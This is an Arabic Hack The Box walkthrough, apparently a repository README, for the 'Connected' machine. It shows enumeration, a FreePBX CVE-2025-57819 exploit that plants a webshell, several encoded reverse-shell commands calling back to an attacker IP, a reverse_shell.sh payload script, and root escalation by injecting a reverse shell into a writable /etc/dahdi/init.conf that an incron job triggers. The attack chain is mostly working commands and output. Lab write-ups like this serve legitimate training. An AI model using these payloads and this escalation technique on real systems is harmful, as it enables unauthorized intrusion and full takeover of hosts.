
# كتابة تحليل آلة Hack The Box Connected تتضمن التعداد، استغلال CVE-2025-57819، شل عكسي، وتصعيد الامتيازات إلى الجذر عبر FreePBX وincron.
nmap -sV 10.129.81.130
النتائج:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.6 (CentOS) PHP/7.4.16
443/tcp open ssl/https Apache/2.4.6 (CentOS) PHP/7.4.16
/etc/hostsecho "10.129.81.130 connected.htb" >> /etc/hosts
gobuster dir -u http://connected.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html
النتائج الرئيسية:
/admin - لوحة إدارة FreePBX/ucp - لوحة تحكم المستخدم/robots.txt - ملف الروبوتاتاستنساخ مستودع WatchTowr Labs:
git clone https://github.com/watchtowrlabs/watchTowr-vs-FreePBX-CVE-2025-57819.git
cd watchTowr-vs-FreePBX-CVE-2025-57819
python3 watchTowr-vs-FreePBX-CVE-2025-57819.py -H http://connected.htb
المخرجات المتوقعة:
[+] FreePBX CVE-2025-57819 Detection Artifact Generator started
[+] Sending exploit request
[+] Waiting 2 minutes for DAG script to be created
[+] VULNERABLE - webshell found: http://connected.htb/this-is-an-ioc-not-actually-watchTowr-8jxir4tsm6.php?cmd=hostname
curl "http://connected.htb/this-is-an-ioc-not-actually-watchTowr-8jxir4tsm6.php?cmd=whoami"
النتيجة:
asterisk
nc -lvnp 4444
النسخة المشفرة:
curl "http://connected.htb/this-is-an-ioc-not-actually-watchTowr-8jxir4tsm6.php?cmd=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.234%2F4444%200%3E%261%27"
ملاحظة: استبدل
10.10.14.234بعنوان IP الخاص بشبكة VPN الخاصة بك.
curl "http://connected.htb/this-is-an-ioc-not-actually-watchTowr-8jxir4tsm6.php?cmd=nc%20-e%20/bin/bash%2010.10.14.234%204444"
curl "http://connected.htb/this-is-an-ioc-not-actually-watchTowr-8jxir4tsm6.php?cmd=python3%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%2210.10.14.234%22%2C4444))%3Bos.dup2(s.fileno()%2C0)%3Bos.dup2(s.fileno()%2C1)%3Bos.dup2(s.fileno()%2C2)%3Bsubprocess.call([%22/bin/bash%22%2C%22-i%22])%27"
listening on [any] 4444 ...
connect to [10.10.14.234] from (UNKNOWN) [10.129.81.130] 55944
bash: no job control in this shell
[asterisk@connected html]$
find /etc -name "*.conf" -writable 2>/dev/null
النتيجة الرئيسية:
/etc/dahdi/init.conf
incron.dcat /etc/incron.d/*
الإدخال ذو الصلة:
/var/spool/asterisk/sysadmin/dahdi_restart IN_CLOSE_WRITE /usr/sbin/sysadmin_dahdi_restart
init.confecho 'bash -c "bash -i >& /dev/tcp/10.10.14.234/4545 0>&1"' >> /etc/dahdi/init.conf
nc -lvnp 4545
echo "Restart" >> /var/spool/asterisk/sysadmin/dahdi_restart
connect to [10.10.14.234] from (UNKNOWN) [10.129.81.130] 45996
bash: no job control in this shell
[root@connected /]#
whoami
# root
id
# uid=0(root) gid=0(root) groups=0(root)
cat /home/asterisk/user.txt
HTB{...user_flag...}
cat /root/root.txt
HTB{...root_flag...}
تم حذف الأعلام عمدًا من هذا المستودع.
htb-labs-connected/
├── README.md
├── README-ES.md
├── exploits/
│ ├── watchTowr-vs-FreePBX-CVE-2025-57819/
│ ├── CVE-2025-57819-exploit/
│ └── CVE-2025-57819-poc/
├── payloads/
│ └── reverse_shell.sh
├── scans/
│ ├── nmap_scan.txt
│ └── gobuster_results.txt
├── screenshots/
└── flags/
الملف: payloads/reverse_shell.sh
#!/bin/bash
# Reverse shell for HTB Connected
# Usage: ./reverse_shell.sh 10.10.14.234 4444
IP=$1
PORT=$2
if [ -z "$IP" ] || [ -z "$PORT" ]; then
echo "Usage: $0 <IP> <PORT>"
exit 1
fi
bash -c "bash -i >& /dev/tcp/$IP/$PORT 0>&1"
الملف: scans/nmap_scan.txt
# Full port scan
nmap -sV -p- -T4 10.129.81.130
# Service and default script scan
nmap -sC -sV -p22,80,443 10.129.81.130
الملف: scans/gobuster_results.txt
# Directory fuzzing
gobuster dir \
-u http://connected.htb \
-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
-x php,txt,html
# Fuzzing the admin directory
gobuster dir \
-u http://connected.htb/admin \
-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
-x php,txt,html,conf,ini,bak
curl -k https://connected.htb
تحقق من واجهة VPN الخاصة بك:
ip addr show tun0
جرّب منفذ استماع آخر إذا لزم الأمر:
4445
8080
1234
/etc/dahdi/init.conf - ملف إعدادات قابل للكتابة تم استخدامه أثناء تصعيد الصلاحيات/etc/incron.d/ - دليل إعدادات incron/var/spool/asterisk/sysadmin/dahdi_restart - المشغل المستخدم لتنفيذ إجراء إعادة التشغيل/var/www/html/ - الدليل الجذر لخادم الويبتم إكمال Connected بنجاح. ✅
توضح سلسلة الهجوم كيف يمكن لمثيل FreePBX المكشوف أن يؤدي إلى وصول أولي من خلال CVE-2025-57819، يليه تصعيد الصلاحيات عبر ملف إعدادات قابل للكتابة ومشغل قائم على incron.
| الخطوة | الإجراء | النتيجة |
|---|
| 1 | Nmap | المنافذ 22 و 80 و 443 مفتوحة |
| 2 | Gobuster | اكتشاف /admin و /ucp و /robots.txt |
| 3 | CVE-2025-57819 | Webshell كمستخدم asterisk |
| 4 | Reverse Shell | Shell تفاعلي كمستخدم asterisk |
| 5 | تصعيد الصلاحيات | incron.d → dahdi_restart → init.conf |
| 6 | الجذر | الحصول على Root Shell |